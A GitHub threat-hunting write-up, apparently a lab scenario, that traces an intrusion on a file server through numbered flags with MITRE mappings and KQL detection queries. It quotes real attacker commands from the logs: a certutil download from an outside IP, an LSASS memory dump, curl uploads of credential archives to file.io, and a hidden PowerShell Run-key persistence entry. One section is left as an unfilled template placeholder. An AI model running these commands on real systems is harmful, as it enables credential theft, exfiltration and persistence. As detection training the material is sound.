buggsjr0/Threat-Hunting-Scenario---Cargo_Hold
GitHub: buggsjr0/Threat-Hunting-Scenario---Cargo_Hold
基于KQL查询的威胁狩猎场景分析工具
Stars: 0 | Forks: 0
**📌 Finding**
"attrib.exe" +h +s C:\Windows\Logs\CBS
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:55:43.9986049Z |
| Process | attrib.exe |
| Parent Process | powershell.exe |
| Command Line | `attrib.exe" +h +s C:\Windows\Logs\CBS` |
**💡 Why it matters**
Setting hidden (+h) and system (+s) attributes on directories is a common defense evasion technique used to conceal attacker artifacts from users, administrators, and basic file browsing tools. By hiding a directory under a trusted Windows path (C:\Windows\Logs\CBS), the attacker blends malicious or staging content into locations that are rarely scrutinized.
This behavior strongly maps to MITRE ATT&CK T1564.001 – Hide Artifacts: Hidden Files and Directories. While administrators may occasionally use attrib.exe, its execution from a scripting engine such as PowerShell significantly raises the signal. When observed alongside other discovery or persistence activity, this action often indicates post-compromise cleanup or preparation for longer-term access.
**🔧 KQL Query Used**
DeviceProcessEvents
| where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22)))
| where DeviceName contains "azuki"
| where ProcessCommandLine has_any ("{", "[", "+", "|")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for attempts to hide files or directories using attribute modification, especially when initiated by scripting engines or non-interactive processes. Prioritize results on servers and shared systems, and look for attribute changes applied to system paths or uncommon directories. Correlate findings with prior discovery, credential access, or persistence activity to identify stealthy post-exploitation behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "attrib.exe"
| where ProcessCommandLine has_any("+h", "+s")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend TargetPath = extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, TargetPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #9: COLLECTION - Staging Directory Path **🎯 Objective** Attackers establish staging locations to organise tools and stolen data before exfiltration. This directory path is a critical IOC. **📌 Finding** C:\Windows\Logs\CBS **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T00:55:43.9986049Z | | Process | attrib.exe | | Parent Process | powershell.exe | | Command Line | "attrib.exe" +h +s C:\Windows\Logs\CBS" | **💡 Why it matters** Attackers commonly create staging directories to aggregate tools, scripts, and collected data before exfiltration, reducing noise and improving operational efficiency. Placing a staging directory under a trusted Windows path such as C:\Windows\Logs\CBS helps the activity blend into legitimate system files and evade casual inspection. The prior use of attribute manipulation to hide this directory further reinforces intent to conceal attacker activity rather than normal administrative use. This behavior aligns with MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, often observed shortly before data exfiltration or lateral movement. When a hidden staging directory is identified on a server, it represents a high-confidence indicator of post-compromise collection activity. **🔧 KQL Query Used** DeviceProcessEvents | where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22))) | where DeviceName contains "azuki" | where ProcessCommandLine has_any ("{", "[", "+", "|") | where InitiatingProcessFileName == "powershell.exe" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName | order by Timestamp asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for suspicious directories created or modified within trusted Windows paths that are rarely used for custom data storage. Focus on directories that are hidden, system-marked, or accessed by scripting engines rather than standard Windows services. Correlating directory creation or modification with prior discovery and defense evasion activity can help identify active staging locations before exfiltration occurs.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath startswith @"C:\Windows\"
| where ActionType in ("FileCreated", "FolderCreated", "FileModified")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend SuspiciousPath = FolderPath
| project TimeGenerated, DeviceName, AccountName, ActionType, SuspiciousPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #10: DEFENSE EVASION - Script Download Command **🎯 Objective** Legitimate system utilities with network capabilities are frequently weaponized to download malware while evading detection. **📌 Finding** "certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1" **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T00:56:47.4100711Z | | Process | certutil.exe | | Parent Process | powershell.exe | | Command Line | `certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1` | **💡 Why it matters** [Explain the impact, real-world relevance, MITRE mapping, and why this is a high-signal indicator. 4-6 sentences for depth.] **🔧 KQL Query Used** DeviceProcessEvents | where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22))) | where DeviceName contains "azuki" | where InitiatingProcessFileName == "powershell.exe" and InitiatingProcessCommandLine !contains "Windows Defender Advanced Threat Protection" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName | order by Timestamp asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunting on signed Windows utilities with network functionality (LOLBINs) executing outbound downloads, especially when initiated by scripting engines. Pay close attention to downloads targeting unusual directories such as C:\Windows\Logs\ or user-writable system paths. Correlating certutil usage with prior staging, discovery, or defense evasion activity significantly increases detection fidelity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "http://", "https://")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend DownloadURL = extract(@"(http[s]?://[^\s]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, DownloadURL, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #11: COLLECTION - Credential File Discovery **🎯 Objective** Credential files provide keys to the kingdom - enabling lateral movement and privilege escalation across the network. **📌 Finding** IT-Admin-Passwords.csv **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:07:53.6746323Z | | Process | xcopy.exe | | Parent Process | N/A | | Command Line | `xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` | **💡 Why it matters** Credential files such as spreadsheets or CSVs containing administrative passwords represent some of the highest-value assets an attacker can obtain during an intrusion. By copying an entire IT administrator directory into a hidden staging location, the attacker is clearly preparing credentials for later use, exfiltration, or offline analysis. Possession of valid admin credentials enables rapid lateral movement, privilege escalation, and often full domain compromise without the need for noisy exploitation. This activity maps directly to MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files, a technique frequently observed in real-world breaches and ransomware operations. File copy utilities like xcopy.exe performing bulk transfers from file shares into concealed directories are a strong, high-signal indicator of credential harvesting rather than legitimate administration. **🔧 KQL Query Used** let timeofattack = todatetime('2025-11-22T00:40:29.5749856Z'); DeviceFileEvents | where TimeGenerated between ((timeofattack - 1h) .. (timeofattack + 1h)) | where DeviceName contains "azuki" | where InitiatingProcessAccountName != "system" | where ActionType == "FileCreated" | project TimeGenerated, ActionType, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for non-system users copying large numbers of files from shared directories—especially IT, Finance, or Admin shares—into uncommon or hidden system paths. Prioritize activity involving archive, copy, or synchronization utilities staging data shortly after discovery or credential access events, as this often precedes exfiltration or lateral movement.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileCreated", "FileCopied")
| where InitiatingProcessFileName in ("xcopy.exe", "robocopy.exe", "powershell.exe", "cmd.exe")
| where FolderPath has_any ("\\FileShares\\", "\\IT", "\\Admin")
| where FolderPath has_any ("\\Windows\\Logs\\", "\\ProgramData\\", "\\Temp")
| where InitiatingProcessAccountName != "SYSTEM"
| project TimeGenerated, DeviceName, AccountName=InitiatingProcessAccountName,
FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #12: COLLECTION - Recursive Copy Command **🎯 Objective** Built-in system utilities are preferred for data staging as they're less likely to trigger security alerts. The exact command line reveals attacker methodology. **📌 Finding** "xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:07:53.6430063Z | | Process | xcopy.exe | | Parent Process | powershell.exe | | Command Line | `"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` | **💡 Why it matters** This activity confirms deliberate and systematic data collection rather than incidental file access. The attacker repeatedly used xcopy.exe to copy multiple high-value enterprise file shares (Contracts, Financial, IT-Admin, Shipping) into a single hidden staging directory, strongly indicating preparation for exfiltration or encryption. The consistency of tooling, destination path, and command-line switches shows hands-on keyboard activity aligned with human-operated intrusion behavior. Staging sensitive business and credential data locally is a common precursor to data theft, ransomware deployment, or double-extortion operations. This behavior maps directly to MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, with supporting elements of T1119 – Automated Collection, and represents a high-confidence indicator of attacker intent rather than reconnaissance alone. **🔧 KQL Query Used** let timeattack = todatetime('2025-11-22T00:40:29.5749856Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack - 3h) .. (timeattack + 3h)) | where DeviceName contains "azuki" | where FileName in ("robocopy.exe", "xcopy.exe") | project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by TimeGenerated asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus on native file-copy utilities writing multiple distinct source directories into a single destination path within a short time window. Repeated use of xcopy.exe, robocopy.exe, or copy targeting unusual or hidden directories (especially under C:\Windows\) is a strong signal of staging activity and should be prioritized over single copy events.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("xcopy.exe", "robocopy.exe")
| where ProcessCommandLine has_any ("/E", "/I", "/H")
| where ProcessCommandLine contains @"C:\Windows\"
| summarize CopyCount = count(),
DistinctSources = dcount(extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by DeviceName, AccountName, ProcessCommandLine
| where CopyCount >= 2 or DistinctSources >= 2
| order by LastSeen desc
### 🚩 Flag #13: COLLECTION - Compression Command **🎯 Objective** Cross-platform compression tools indicate attacker sophistication. The full command line reveals the exact archiving methodology used. **📌 Finding** "tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin . **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:30:10.0981853Z | | Process | tar.exe | | Parent Process | powershell.exe | | Command Line | `tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin` | **💡 Why it matters** The use of tar.exe on a Windows system is a strong indicator of deliberate attacker tradecraft rather than routine administrative activity. Attackers commonly compress staged data to reduce size, preserve directory structure, and prepare files for rapid exfiltration or encryption. In this case, the archive targets a hidden staging directory (C:\Windows\Logs\CBS\it-admin) that already contains harvested credential material, confirming this activity as a late-stage collection step rather than benign maintenance. Compression marks a clear transition from discovery and collection into exfiltration readiness, meaning containment urgency is high. This behavior aligns with MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility, a technique frequently observed immediately prior to data theft or ransomware deployment. **🔧 KQL Query Used** let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack4 - 2h) .. (timeattack4 + 2h)) | where DeviceName contains "azuki" | where FileName in ("tar.exe", "gzip.exe") | project TimeGenerated, DeviceName, AccountName, ActionType, ProcessCommandLine, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query during proactive threat hunts to identify archive creation from suspicious or nonstandard directories (e.g., Windows\Logs, Temp, user-writable system paths). Pay close attention to compression tools executed by scripting engines such as PowerShell, and correlate results with earlier file copy or credential discovery activity to confirm malicious staging behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("tar.exe", "gzip.exe", "7z.exe", "rar.exe")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #14: CREDENTIAL ACCESS - Renamed Tool **🎯 Objective** Renaming credential dumping tools is a basic OPSEC practice to evade signature-based detection. **📌 Finding** pd.exe **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:03:19.9845969Z | | Process | powershell.exe | | Parent Process | powershell.exe | | Command Line | `powershell.exe` | **💡 Why it matters** Renaming credential dumping tools is a common evasion technique used to bypass signature-based detections that rely on known filenames such as mimikatz.exe. The appearance of an unfamiliar executable (pd.exe) created shortly before credential access activity strongly suggests a renamed or custom-packed dumping utility. Attackers frequently stage these tools under innocuous names to blend into the environment and delay defender response. When combined with prior collection, staging, and compression behavior, this indicates the attacker is actively attempting to harvest credentials for lateral movement or privilege escalation. This activity maps to MITRE ATT&CK T1003 – OS Credential Dumping, with evasion via T1036 – Masquerading, and represents a high-confidence signal of hands-on-keyboard adversary activity. **🔧 KQL Query Used** let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z'); DeviceFileEvents | where TimeGenerated between ((timeattack4 - 1h) .. (timeattack4 + 1h)) | where DeviceName contains "azuki" | where ActionType == "FileCreated" | project TimeGenerated, DeviceName, ActionType, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for newly created executables in atypical directories that are shortly followed by credential access, discovery, or compression activity. Prioritize binaries launched by PowerShell or created outside standard install paths, especially on servers and high-value systems. Correlating file creation with suspicious process execution within a short time window significantly increases detection confidence.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType == "FileCreated"
| where FileName endswith ".exe"
| where FolderPath has_any ("\\Windows\\Logs\\", "\\Temp\\", "\\ProgramData\\")
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #15: CREDENTIAL ACCESS - Memory Dump Command **🎯 Objective** The complete process memory dump command line is critical evidence showing exactly how credentials were extracted. **📌 Finding** "pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp" **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:24:44.3906047Z | | Process | pd.exe | | Parent Process | "powershell.exe" | | Command Line | '"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp' | **💡 Why it matters** Dumping the memory of LSASS (Local Security Authority Subsystem Service) is one of the most reliable indicators of credential theft on Windows systems. LSASS stores sensitive authentication material including plaintext credentials, NTLM hashes, and Kerberos tickets for logged-on users. In this case, the attacker used a renamed credential dumping tool (pd.exe) with explicit memory dump arguments (-ma) to target the LSASS process, confirming intentional credential access rather than accidental or benign behavior. Writing the dump file to a disguised staging directory (C:\Windows\Logs\CBS) further demonstrates attacker OPSEC and an attempt to evade casual inspection. This activity maps directly to MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory, a high-impact technique frequently used to enable privilege escalation, lateral movement, and full domain compromise. Detection of LSASS dumping should be treated as a containment-critical event. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ProcessCommandLine contains "pd.exe" | project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
When hunting for credential dumping, prioritize behavior over tool names. Attackers frequently rename utilities like ProcDump to evade signature-based detections, but LSASS dumping still requires distinctive command-line flags and access patterns. Focus on memory dump arguments (-ma, MiniDump, .dmp) combined with references to LSASS or dump files written to nonstandard directories.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where ProcessCommandLine has_any ("lsass", "-ma", ".dmp")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine,
FolderPath
| order by TimeGenerated desc
### 🚩 Flag #16: EXFILTRATION - Upload Command **🎯 Objective** Command-line HTTP clients enable scriptable data transfers. The complete command syntax is essential for building detection rules. **📌 Finding** curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:59:54.2755596Z | | Process | curl.exe | | Parent Process | powershell.exe | | Command Line | curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io | **💡 Why it matters** The use of curl.exe to upload an archive to an external file-sharing service represents a clear data exfiltration action, not preparation or staging. Command-line HTTP clients allow attackers to automate transfers, bypass browser-based controls, and operate quietly through scripts or living-off-the-land binaries. In this case, the attacker exfiltrated a compressed archive (credentials.tar.gz) from a disguised staging directory, confirming that previously collected and compressed credential material was successfully moved off the host. The destination, file.io, is a legitimate but commonly abused public file-sharing service, making this traffic blend into normal outbound HTTPS activity. This behavior aligns with MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Channel, and marks a critical point where sensitive data has already left the environment. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ProcessCommandLine contains "http" | project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunts on outbound data transfers initiated by scripting engines or command-line utilities rather than relying solely on destination reputation. File uploads using curl.exe or similar tools (wget, Invoke-WebRequest) combined with archive file extensions and public file-sharing domains are strong indicators of hands-on-keyboard exfiltration activity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("curl.exe", "wget.exe")
| where ProcessCommandLine has_any ("http", "https", "-F", "--upload-file")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #17 EXFILTRATION - Cloud Service **🎯 Objective** Cloud file sharing services provide convenient, anonymous exfiltration channels that blend with legitimate business traffic. **📌 Finding** file.io **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:25:37.9206525Z | | Process | curl.exe | | Parent Process | powershell | | Command Line | "curl.exe" -F file=@C:\Windows\Logs\CBS\lsass.dmp https://file.io | **💡 Why it matters** Exfiltrating data to public cloud file-sharing services represents a high-risk data loss scenario because these platforms are widely trusted, encrypted, and commonly allowed through perimeter controls. Attackers favor services like file.io because uploads occur over standard HTTPS, making the traffic difficult to distinguish from legitimate business activity without endpoint context. In this case, the attacker uploaded a full LSASS memory dump, which almost certainly contains cached credentials, NTLM hashes, or Kerberos material. This confirms not just successful credential access, but successful credential theft and removal from the environment, eliminating any opportunity for recovery through containment alone. This behavior aligns with MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage, and represents a late-stage breach milestone where incident response urgency is critical. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceNetworkEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RemoteIP, RemoteUrl, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for endpoint-initiated connections to public file-sharing services that originate from scripting engines or command-line tools rather than browsers. Prioritize uploads involving sensitive file types such as memory dumps, archives, or database exports, especially when correlated with prior credential dumping or compression activity.
DeviceNetworkEvents
| where TimeGenerated > ago(30d)
| where RemoteUrl has_any ("file.io", "transfer.sh", "anonfiles", "gofile", "pastebin")
| where InitiatingProcessFileName in ("curl.exe", "powershell.exe", "cmd.exe")
| where InitiatingProcessCommandLine has_any (".dmp", ".zip", ".tar", ".tar.gz", ".7z")
| project TimeGenerated,
DeviceName,
AccountName,
RemoteUrl,
RemoteIP,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #18: PERSISTENCE - Registry Value Name **🎯 Objective** Registry autorun keys provide reliable persistence that executes on every system startup or user logon. **📌 Finding** FileShareSync **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:10:50.8253766Z | | Process | reg.exe | | Parent Process | powershell | | Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` | **💡 Why it matters** Registry Run keys provide one of the most reliable and low-noise persistence mechanisms available to attackers, as they guarantee execution on every system startup or user logon. By choosing the value name FileShareSync, the attacker deliberately blends into expected enterprise software naming conventions, reducing the likelihood of casual discovery by administrators or users. The associated command launches a hidden PowerShell process that executes a script from a nonstandard system path, indicating continued control rather than a one-time payload. This persistence occurs after credential access and data exfiltration, strongly suggesting the attacker intends to maintain long-term access for follow-on operations or re-entry. This behavior maps directly to MITRE ATT&CK T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys, a technique commonly observed in hands-on-keyboard intrusions and ransomware precursor activity. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceRegistryEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to proactively identify newly created or modified Run key values, especially those added via command-line tools like reg.exe or PowerShell. Pay close attention to value names that appear legitimate but point to scripts, hidden PowerShell execution, or binaries located outside standard program directories. Correlating these events with earlier credential access or exfiltration activity significantly increases detection confidence.
DeviceRegistryEvents
| where TimeGenerated > ago(30d)
| where ActionType == "RegistryValueSet"
| where RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\Run"
| where InitiatingProcessFileName in ("reg.exe", "powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
RegistryValueName,
RegistryKey,
RegistryValueData,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #19: PERSISTENCE - Beacon Filename **🎯 Objective** Process masquerading involves naming malicious files after legitimate Windows components to avoid suspicion. **📌 Finding** svchost.ps1 **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:10:50.8253766Z | | Process | reg.exe | | Parent Process | powershell | | Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` | **💡 Why it matters** Masquerading malicious payloads as legitimate Windows components is a deliberate evasion technique designed to bypass both human review and basic security controls. By naming the beacon svchost.ps1, the attacker abuses trust in the well-known svchost.exe process, increasing the likelihood that the file will be overlooked during triage or routine audits. Placing this script in C:\Windows\System32 further strengthens the disguise, as files in this directory are typically assumed to be trusted and system-managed. When combined with a registry Run key, this filename choice enables stealthy, long-term persistence with minimal operational noise. This activity aligns with MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location, a common technique in post-exploitation phases where attackers prioritize survivability over speed. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceRegistryEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for script files (.ps1, .vbs, .js) located in system directories such as System32 or Windows\Logs, especially when referenced by autorun registry keys. Filenames that closely resemble legitimate Windows binaries (e.g., svchost, lsass, services) but use scripting extensions are high-confidence indicators of malicious persistence.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath has_any ("\\Windows\\System32", "\\Windows\\SysWOW64")
| where FileName endswith ".ps1"
| where FileName has_any ("svchost", "lsass", "services", "winlogon")
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #20: ANTI-FORENSICS - History File Deletion **🎯 Objective** PowerShell saves command history to persistent files that survive session termination. Attackers target these files to cover their tracks. **📌 Finding** ConsoleHost_history.txt **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | ConsoleHost_history.txt | | Timestamp | 2025-11-22T02:26:01.1661095Z | | Process | powershell.exe | | Parent Process | explorer.exe | | Command Line | N/A | **💡 Why it matters** PowerShell maintains a persistent command history file (ConsoleHost_history.txt) specifically to support forensic reconstruction after an interactive session ends. Deleting this file is a deliberate anti-forensics action intended to erase evidence of executed commands, tooling, and operator intent. This behavior is rarely performed during normal administrative activity and typically occurs after credential access, persistence, or lateral movement—once the attacker is attempting to reduce visibility and slow incident response. The timing of this deletion shortly after malicious PowerShell activity strongly suggests an effort to conceal hands-on-keyboard operations. This activity maps to MITRE ATT&CK T1070.003 – Indicator Removal on Host: Clear Command History, a common cleanup technique used by post-compromise operators to frustrate forensic timelines and hinder root cause analysis. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceFileEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ActionType == "FileDel **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Monitor for deletion or truncation of PowerShell history files, particularly when initiated by powershell.exe or shortly following suspicious PowerShell execution. Correlate these events with credential access, registry persistence, or suspicious script execution to identify full attack chains.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileDeleted", "FileDeletedByProcess")
| where FileName =~ "ConsoleHost_history.txt"
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
## High-Level Summary This intrusion represents a full-spectrum post-compromise attack leveraging valid credentials to re-enter the environment, move laterally via RDP, and systematically enumerate the network and host. The attacker demonstrated strong operational discipline by staging data in nonstandard system directories, abusing living-off-the-land binaries (LOLBins), and carefully sequencing actions to avoid early detection. Credential access via LSASS memory dumping marked a decisive escalation, followed by deliberate compression and exfiltration of sensitive data using both direct HTTP transfer and cloud-based file hosting to blend with legitimate traffic. Persistence was established through registry autorun keys using masqueraded filenames, and the operation concluded with targeted anti-forensic actions to remove PowerShell execution history. Overall, the activity reflects a capable adversary executing a methodical, goal-oriented campaign rather than opportunistic or automated malware.
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for attempts to hide files or directories using attribute modification, especially when initiated by scripting engines or non-interactive processes. Prioritize results on servers and shared systems, and look for attribute changes applied to system paths or uncommon directories. Correlate findings with prior discovery, credential access, or persistence activity to identify stealthy post-exploitation behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "attrib.exe"
| where ProcessCommandLine has_any("+h", "+s")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend TargetPath = extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, TargetPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
